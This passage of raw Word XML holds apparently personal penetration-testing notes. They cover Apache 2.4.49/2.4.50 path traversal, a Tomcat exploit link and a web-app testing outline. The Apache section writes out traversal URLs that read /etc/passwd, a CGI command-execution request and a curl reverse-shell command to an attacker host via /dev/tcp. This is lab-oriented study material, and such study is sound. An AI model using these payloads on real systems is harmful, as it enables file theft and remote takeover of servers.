        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t>A Path Traversal exploit is an attack that aims to access resources that are normally inaccessible by abusing flaws in path resolution and/or normalization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE45733" w14:textId="0D112FF8" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Normalization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6769ED6C" w14:textId="16B1F6C4" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>URL Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4454801D" w14:textId="34D06CE1" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>RFC 3986 S.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36F574" w14:textId="77777777" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t xml:space="preserve">A recent change in the path normalization module in the Apache server then allowed a specially crafted URL to bypass the filters and traverse beyond the document root, allowing arbitrary file read on the system if the configuration allowed it. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AEDC4BD" w14:textId="16734526" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t>Furthermore, if the CGI module was enabled, then arbitrary file execution is also possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F308CC2" w14:textId="0BF4F8C7" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apache Exploitation Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF8B2BF" w14:textId="4E112941" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apache 2.4.49 w/o CGI Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="495ECD71" w14:textId="03687FAE" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t>'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF6DA40" w14:textId="61CAC09B" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apache 2.4.49 w/ CGI Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4BE60E" w14:textId="3F3FE360" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:t>'http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash' -d 'echo Content-Type: text/plain; echo; cat /etc/passwd' -H "Content-Type: text/plain"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11029F1D" w14:textId="79283E9F" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Apache 2.4.50 w/o CGI Enabled</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F75EC3" w14:textId="247CEE82" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="002C1F0D">
        <w:lastRenderedPageBreak/>
        <w:t>'http://localhost:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6B303" w14:textId="3AD5591E" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C89863" w14:textId="41CDCE7A" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId138" w:history="1">
        <w:r w:rsidRPr="005A1A1E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://vineethbharadwaj.medium.com/cve-2021-41773-42013-thm-write-up-task-4-8af1832236a5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="42ACA3AF" w14:textId="030CA9F0" w:rsidR="002C1F0D" w:rsidRDefault="002C1F0D" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Remote shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DFFECF" w14:textId="6F40DBF1" w:rsidR="002C1F0D" w:rsidRPr="002C1F0D" w:rsidRDefault="007A6E65" w:rsidP="002C1F0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="007A6E65">
        <w:t>curl -v ‘http://&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6E65">
        <w:t>_ip&gt;:8083/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash' -d ‘echo; bash -i &gt;&amp; /dev/tcp/&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6E65">
        <w:t>_machine_ip&gt;/&lt;</w:t>
      </w:r>
      <w:r>
        <w:t>attacker</w:t>
      </w:r>
      <w:r w:rsidRPr="007A6E65">
        <w:t>_machine_port&gt; 0&gt;&amp;1’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C478A7B" w14:textId="77777777" w:rsidR="00B82DF6" w:rsidRDefault="00B82DF6" w:rsidP="00B82DF6">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ED151DC" w14:textId="3394999F" w:rsidR="009D64C0" w:rsidRDefault="009D64C0" w:rsidP="009D64C0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BA01F10" w14:textId="6FB54A47" w:rsidR="009D64C0" w:rsidRDefault="007F560A" w:rsidP="009D64C0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>APACHE TOMCAT COYOTE 1.1 Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D8A89" w14:textId="03E68DA3" w:rsidR="007F560A" w:rsidRDefault="007A6E65" w:rsidP="009D64C0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId139" w:anchor="Uploading_Java_Executable_with_Metasploit" w:history="1">
        <w:r w:rsidR="007F560A" w:rsidRPr="00F13BC4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://charlesreid1.com/wiki/Metasploitable/Apache/Tomcat_and_Coyote#Uploading_Java_Executable_with_Metasploit</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3698891C" w14:textId="0AD2FB61" w:rsidR="007F560A" w:rsidRDefault="007F560A" w:rsidP="009D64C0">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="733D23B9" w14:textId="6B7FC698" w:rsidR="007F560A" w:rsidRDefault="00CB38CF" w:rsidP="009D64C0">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>WebAppSecurity 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57178CE7" w14:textId="0BBFE2FE" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF29E32" w14:textId="69C21E76" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BADB7BA" w14:textId="2C5601DA" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>discover server version, ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A91E088" w14:textId="4AEB4A2E" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>burpsuite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F899456" w14:textId="79BA6F9D" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>discover language used and version to create website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0058CD21" w14:textId="4ED8A414" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681B8348" w14:textId="7C1A3054" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Two methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD06B9" w14:textId="40B3F399" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Method 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5294FC23" w14:textId="7D4A4946" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>go through every page and test functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EA0F72" w14:textId="6C6F8FF5" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test for all bugs and vulns that apply to each page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF29E4C" w14:textId="0F2DE8F8" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Method 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4F2199" w14:textId="30BE1045" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>break down testing into different stages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0682E45D" w14:textId="0BB9877C" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2292BB" w14:textId="1034E328" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FB1FA4" w14:textId="7DB18CE3" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F76D1FC" w14:textId="555C85C7" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Client Side Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5984FF74" w14:textId="03D5686D" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Application Logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D13C0BE" w14:textId="68C9671D" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1185C2C4" w14:textId="194D1948" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test mechanisms and logic that allow users to log in to an app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCF9914" w14:textId="492E00E3" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Brute Forcing/Weak Credentials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E4DAF0" w14:textId="01D685AA" w:rsidR="00244477" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>common sign ins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B57E3B" w14:textId="1DD28641" w:rsidR="00CB38CF" w:rsidRDefault="00CB38CF" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307527A2" w14:textId="6AD05F89" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Developer &gt; Storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EE00DB" w14:textId="11959451" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cookies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3267B414" w14:textId="7E7CEFFA" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>LFI in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0F521E" w14:textId="31383E0E" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP ZAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B16D76" w14:textId="630808B8" w:rsidR="00E80B2B" w:rsidRDefault="00E80B2B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>spider crawl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76EC69" w14:textId="3582A737" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>fuzz usernames using /register.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7055BB53" w14:textId="03ABC93D" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check output for names that cant be registered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A39DBDC" w14:textId="4643798C" w:rsidR="00324B18" w:rsidRDefault="00324B18" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>dirbuster first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259ACF9F" w14:textId="37D1ED8A" w:rsidR="00E80B2B" w:rsidRDefault="00E80B2B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Cross Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B92925D" w14:textId="07B343C9" w:rsidR="00E80B2B" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Persistent/Non-Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033C199D" w14:textId="71FA5D01" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Non-Persistent/Reflected</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCEEDFE" w14:textId="60D2A450" w:rsidR="00E578E8" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId140" w:history="1">
        <w:r w:rsidR="00E578E8" w:rsidRPr="0037253A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="291BFFFA" w14:textId="2F6CD9B8" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE929B4" w14:textId="01036B12" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2F4FE0" w14:textId="7CECAEFC" w:rsidR="00E578E8" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId141" w:history="1">
        <w:r w:rsidR="00E578E8" w:rsidRPr="0037253A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0CA63E93" w14:textId="31A54B6E" w:rsidR="00E578E8" w:rsidRDefault="00E578E8" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
